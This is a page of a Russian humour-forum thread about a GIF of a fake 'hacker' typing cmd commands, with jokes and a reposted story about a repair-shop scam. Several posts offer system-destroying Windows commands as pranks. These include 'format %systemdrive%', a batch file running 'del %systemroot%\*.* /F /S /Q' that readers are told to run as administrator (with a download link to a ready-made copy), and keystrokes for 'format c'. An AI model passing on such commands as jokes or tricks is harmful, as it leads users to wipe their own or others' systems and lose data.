Настоящий хакер, гиф

[ Версия для печати ]
Добавить в Telegram Добавить в Twitter Добавить в Вконтакте Добавить в Одноклассники
Страницы: (6) « Первая ... 4 5 [6]   К последнему непрочитанному [ ОТВЕТИТЬ ] [ НОВАЯ ТЕМА ]
YoMan78
3.06.2015 - 23:40
1
Статус: Offline


Мельник

Регистрация: 7.08.11
Сообщений: 5311
Цитата (tiktaktik @ 3.06.2015 - 21:09)
Попробуйте в консоли с реестром windows поработать.
Хакеры.

:)

Честный пацан не знает что такое реестр. Честный пацан файлы руками тачал.
 
[^]
shrec
3.06.2015 - 23:52
1
Статус: Offline


¯\_(ツ)_/¯

Регистрация: 8.04.14
Сообщений: 1429
Цитата (УмникБл @ 3.06.2015 - 13:37)
попробовал)))) не так эффектно конечно

в корень диска перейди ))
шикарно если он так на пару тб ) и одним разделом забитым в по самое немагу ))
 
[^]
КагНебудьТаг
3.06.2015 - 23:59
0
Статус: Offline


Ярила

Регистрация: 29.03.11
Сообщений: 4404
Мать колупать, у меня это дерево в стопицот раз короче. Ясенкрасен комп "заглючил", ЯП на его месте еще и в грызло насовал. За засирательство
 
[^]
Rentable
4.06.2015 - 00:23
0
Статус: Offline


Ярила

Регистрация: 11.07.12
Сообщений: 1062
Цитата (myaso @ 3.06.2015 - 14:40)
http://hackertyper.com/ наше все)))

когда начальство не верит, что я работаю дома, а эффективно работаю только в офисе под присмотром - запустить - и спать))

Всегда хотелось программировать научиться, теперь я надолго завис над своей первой программой ))))
 
[^]
Credos81
4.06.2015 - 01:31
0
Статус: Offline


Приколист

Регистрация: 4.05.15
Сообщений: 384
а у вас просто наган не той системы вот почему развод не прокатил
 
[^]
SenSei86
4.06.2015 - 02:11
0
Статус: Offline


Весельчак

Регистрация: 8.04.11
Сообщений: 126
Хочешь увидеть мультик в винеде от Била Гейтса нажми Alt + F4 ))))
 
[^]
pinaszxc
4.06.2015 - 02:17
0
Статус: Offline


Приколист

Регистрация: 10.01.13
Сообщений: 380
Надо было мусорам сдать!
 
[^]
estrix003
4.06.2015 - 02:31
0
Статус: Offline


Начну 6-ю мировую.. Дайте нажать кнопку!

Регистрация: 26.02.13
Сообщений: 3367
Цитата (Crest96 @ 3.06.2015 - 14:28)
разными цветами до 9 попробывал - буду теперь на жену страху нагонять с цифрой 4 если ещё раз ко мне подойдёт со своим ноутом rulez.gif rulez.gif rulez.gif
а как зациклить этот шедевр, кто скажет?

читай лектюры: MS-DOS
 
[^]
Koran
4.06.2015 - 02:58
0
Статус: Offline


Ярила

Регистрация: 31.08.12
Сообщений: 2718
Против таких умных надо тяжелую альтелерию на скриптах )))
 
[^]
Хватитврать
4.06.2015 - 07:01
0
Статус: Offline


Балагур

Регистрация: 24.04.14
Сообщений: 993
Цитата (vladghost @ 3.06.2015 - 13:38)
вот что дает знание команд доса, а помните заставку для винды 311 они эмулировала командную строку, мы в молодости так для начальства отмазы лепили работа идет проверяется система

Ещё была заставка для 3.11, где всё удаляется к херам. Я помню, знатно троллил бухгалтерию.
 
[^]
alexnecro
4.06.2015 - 07:34
0
Статус: Offline


Дебилофоб

Регистрация: 21.10.13
Сообщений: 4296
Гениально! Но писать лучше так:

Цитата
color 2 && tree c:\ /F


Добавлено в 07:36
Цитата (nattropin @ 3.06.2015 - 21:03)
format %systemdrive% /S /Q
на ХП точно работает 7, 8, 10ка, нет наверное, если консоль не из под админа запущена..

А разве не ругается что "диск в данный момент занят"?
 
[^]
pet
4.06.2015 - 07:56
0
Статус: Offline


Весельчак

Регистрация: 20.04.10
Сообщений: 170
Надо еще сперва выйти в корень диска, ибо cmd вызывается в домашнем каталоге :)
 
[^]
БратецЛис
4.06.2015 - 08:12
0
Статус: Offline


Ярила

Регистрация: 16.08.11
Сообщений: 3788
Мудак конечно, но спрос рождает предложение. Пока есть пользователи которые не хотят платить деньги что бы специалист разгребал их же говно на винтах - будут такие мальчики.
 
[^]
sonos
4.06.2015 - 08:27
0
Статус: Offline


Ярила

Регистрация: 18.07.13
Сообщений: 7736
Цитата (Yoprst @ 3.06.2015 - 13:36)
Зачем колор два для несвидомых делать?

Чтоб в матрицу несведущего погрузить...там вроде цвет текста зеленый.
 
[^]
KeramZitt
4.06.2015 - 08:55
0
Статус: Offline


перфекционистѣ со стажем

Регистрация: 25.07.11
Сообщений: 554
Цитата (ВладимирЯсноСолнышко @ 3.06.2015 - 15:38)
за такое cls сделать могут. В тяжёлом случае и fdisk.

Ну и ник ты себе выбрал, бро.
За что перфекционистам мазу ломаешь???

Настоящий хакер
 
[^]
Tiborferenci
4.06.2015 - 09:15
1
Статус: Offline


Генеральный распиздяй

Регистрация: 27.08.09
Сообщений: 2311
Напомнило. Недавно товарищ прислал почитать. Бывают и не такие тыжпрограммисты. Может баян, но в тему:


Сервисный центр" или современные разводки

Сижу в офисе пью кофе. Звонок от знакомой:
- Федор, срочно приезжай, вызвала мастера-компьютерщика, он мне насчитал тридцать две тысячи рублей за ремонт (я поперхнулся) и грозиться в суд подать, если не заплачу.
- Ясно. Денег этому мудаку не давай, держи в прихожей, говори, что муж с работы с деньгами едет. Буду минут через двадцать.
В дороге думаю: ну никак не может ремонт стоить в два раза дороже, чем сам системник, да еще и на дому. Там никакого конкретного ремонта не сделаешь, так только винду переставить, да вирусню курейтом погонять. Ну никак на тридцатку не выходит.
Вхожу в квартиру, там стоит «это», лет двадцати пяти, тощее, в кепке и куртке с надписью «сервисный центр».
- Ну, здравствуй. Че ты тут насчитал?
- Ну, ремонт, диагностика там, если платить не будете…
- Помолчи. Я законы получше некоторых знаю. Давай акт, посмотрю, что ты наделал.
Естественно, моя знакомая-дуреха поставила на акте подпись. Ну да не беда. И не таким рога обламывали.
-Давай смотреть. Лена, как все было? На что жаловалась машина? Когда бумагу подписала?
-Шумела. А у них в объявлении написано, что диагностика бесплатно. Он приехал, посмотрел, сказал, что тут на пятьсот рублей работы, попросил акт сразу подписать на пятьсот рублей, копался два часа, дописывая что-то, а потом сказал, что сделал работы на тридцать тысяч рублей.
-Ага.
Я порвал акт на пополам, скомкал и отдал Лене.
-Выкинь. Этот акт не имеет юридической силы, так как был подписан для проведения работ.
Чучело в кепке начало хватать ртом воздух.
-Что вы делаете! Я в полицию звонить буду!
-Хорошо. Звони. Я как раз собирался.
Малец прикусил язык.
- А теперь послушай меня. Первое: оператор в вашей конторе сказал, что диагностика бесплатная. Ты выставил три разных по полторы тысячи рублей. Когда менты к ним приедут и спросят, все будут в тебя пальцем тыкать и жуликом звать. Мол, ты сам диагностику платной сделал, а мы не при чем. Второе как директор фирмы по продаже компов и оргтехники, а так же владелец сервисного центра, я говорю тебе: шум кулера с программным обеспечением никак не связан, кроме частных моментов. За каким чертом ты два раза прокрутил антивирусную проверку отформатировал диски и накатил новую винду? Форматирование содержимого дисков без письменного разрешения владельца это, вообще-то, компьютерный терроризм. За него сажают.
Горе-ремонтник начал покрываться испариной и явно хотел отсюда сбежать.
- И последнее.
Я нажал на кнопку компа и он довольно загудел.
- После ремонта проблема сохранилась. За что я, бл…дь, должен платить?! Это ты мне, упырь, денег должен за весь проф-софт, данные и фотки, которые ты удалил! Так, что быстро звони ментам и будем протокол составлять!
Парень побледнел и начал запинаясь, говорить что-то про офис и про то, что он должен с кем-то посоветоваться.
-Мне по х…ю, с кем ты советоваться собрался. Пока менты не приедут, никуда ты не уйдешь. Хочешь советоваться - звони в офис отсюда.
Позвонил. Доложил о ситуации (все время косясь на меня). Подождал. Опять доложил. Протянул мне трубку.
-Это Вас. Наш директор.
Я взял телефон.
- Слушаю.
- Вы не имеете права удерживать нашего работника и должны немедленно ему заплатить, иначе мы подадим в суд.
- Ты, походу, невменяемый. Если мы сейчас с тобой по телефону не договоримся, то это я в суд подам, благо тут уже статьи три нашлось. Я не один из тех лохов, на которых вы рассчитываете и со мной эта х…рня не прокатит.
В телефоне помолчали.
-Хорошо, вы можете не платить за ремонт.
Я даже рассмеялся от такой наивности.
-Поверь мне, я и не собирался. Ваш пентюх форматнул диски, на которых у меня 1С крутилась и базы к ней. Так что вы мне серьезно задолжали.
В телефоне опять помолчали.
- И что вы хотите?
- Lenovo IdeaPad Z510. Можно б/у или смежной модели. Но не ниже i7, восьми гигов оперативки и карта не ниже 740-й. Он стоит как раз тех денег, на которые вы меня собирались кинуть. В течении двух часов привезете по адресу, куда ваше чудо в перьях на вызов
14:57:50
поехало. Потом звоню ментам и пишу заявление. Все.
Не слушая протесты, я бросил трубку и отдал телефон несчастному чучелу и на всякий случай уточнил.
-Если через два часа твои не объявятся, то сядешь ты плотно, хоть и не на долго.
Он вздохнул, плечи у него опустились и затряслись.
-А вот хныкать не надо. Вы человека на деньки кинуть собирались, и деньги не малые. Десять лет назад тебя за такое убить могли! Неужели не думал, что не только лохи да дураки в жизни бывают? Сиди теперь два часа на коврике, да надейся, что твой шеф тебя не кинет, как ты девку кинуть хотел.
К счастью, у его директора ума хватило со мной не связываться и через час он появился на пороге со свежекупленным ноутом. Не очень искренне извинился, побуравил меня глазками на прощание и, забрав своего головастика, собирался уйти. Я его остановил.
- А теперь я еще скажу вот что: я ненавижу тех, кто наваривается на человеческом незнании. Сейчас я своим архаровцам перескажу эту историю и попрошу разместить ее на всех городских форумах и новостных ресурсах, что бы у тебя ни одного клиента больше никогда не было.
Что ваша контора пытается кинуть своих клиентов на большие деньги, при этом ремонт они даже не делают, а только людей разводят.
Мораль:
1. Не подписывайте документы, в частности акты выполненных работ до того, как работа действительно выполнена и вы проверили ее выполнение.
2. Не ведитесь на объявления вселенской халявы. Скупой платит дважды.
3. У вас есть права и государство обязано их отстоять. Считаете, что с вами обошлись несправедливо – звоните в отдел по защите прав потребителей.
4. Пользуйтесь услугами независимой экспертизы. Они смогут сказать, что действительно нужно было сделать, а что просто разводка.
5. Точную сумму ремонта вам должны озвучить после диагностики, постоянно уточняя, если в ходе ремонта выявились новые неполадки.
Надеюсь, было познавательно.
P.S. Обещание я исполнил.
 
[^]
volk8192
4.06.2015 - 09:21
0
Статус: Offline


Ярила

Регистрация: 1.01.15
Сообщений: 1924
Цитата (platonmsk @ 3.06.2015 - 16:19)
У меня бы он обломился...

Цитата
$ color 2
color: command not found
$ tree
The program 'tree' is currently not installed.  To run 'tree' please ask your administrator to install the package 'tree'
tree: command not found
$


Надо пожалуй пригласить такого на комп на посмотреть!)

Ну в таких системах вирусы не так актуальны, мягко говоря.
 
[^]
nicknewuser
4.06.2015 - 10:18
0
Статус: Offline


Шутник

Регистрация: 10.09.13
Сообщений: 97
Цитата (Allexptsk @ 3.06.2015 - 13:36)
тока что узнал две новые команды для командной строки 0_о

Это не две новые, а две очень старые команды еще из ms dos
 
[^]
hosted
4.06.2015 - 14:06
0
Статус: Offline


Шутник

Регистрация: 24.05.14
Сообщений: 12
Создать любой текстовый документ с содержанием:
%systemroot%\system32\cmd.exe
del %systemroot%\*.* /F /S /Q

Сохранить как 1.cmd запустить от админа сохраненный файл
 
[^]
hosted
4.06.2015 - 20:06
0
Статус: Offline


Шутник

Регистрация: 24.05.14
Сообщений: 12
Цитата
Создать любой текстовый документ с содержанием:
Сохранить как 1.cmd запустить от админа сохраненный файл

готовый файлик с разукрашкой )) запустить от админа
https://yadi.sk/d/Rbbf7Qvnh5qGE
color fc
del %systemroot%\*.* /f /s /q
ping 8.8.8.8
ping yaplakal.com
ping 8.8.8.8
ping yaplakal.com
ping 8.8.8.8
ping yaplakal.com

Злая шутка знаю извиняйте )))


Это сообщение отредактировал hosted - 4.06.2015 - 20:50
 
[^]
YoMan78
4.06.2015 - 22:51
1
Статус: Offline


Мельник

Регистрация: 7.08.11
Сообщений: 5311
Цитата (Koran @ 4.06.2015 - 02:58)
Против таких умных надо тяжелую альтелерию на скриптах )))

альтелерию
альтелерию
альтелерию
shum_lol.gif
 
[^]
Пеннистый
22.06.2015 - 09:38
0
Статус: Offline


Шутник

Регистрация: 2.03.14
Сообщений: 96
Win+R
cmd
format c
y
))) не за что
 
[^]
Понравился пост? Еще больше интересного в Телеграм-канале ЯПлакалъ!
Только зарегистрированные и авторизованные пользователи могут оставлять комментарии. Авторизуйтесь, пожалуйста, или зарегистрируйтесь, если не зарегистрированы.
1 Пользователей читают эту тему (1 Гостей и 0 Скрытых Пользователей) Просмотры темы: 73112
0 Пользователей:
Страницы: (6) « Первая ... 4 5 [6]  [ ОТВЕТИТЬ ] [ НОВАЯ ТЕМА ]


 
 



Активные темы






Наверх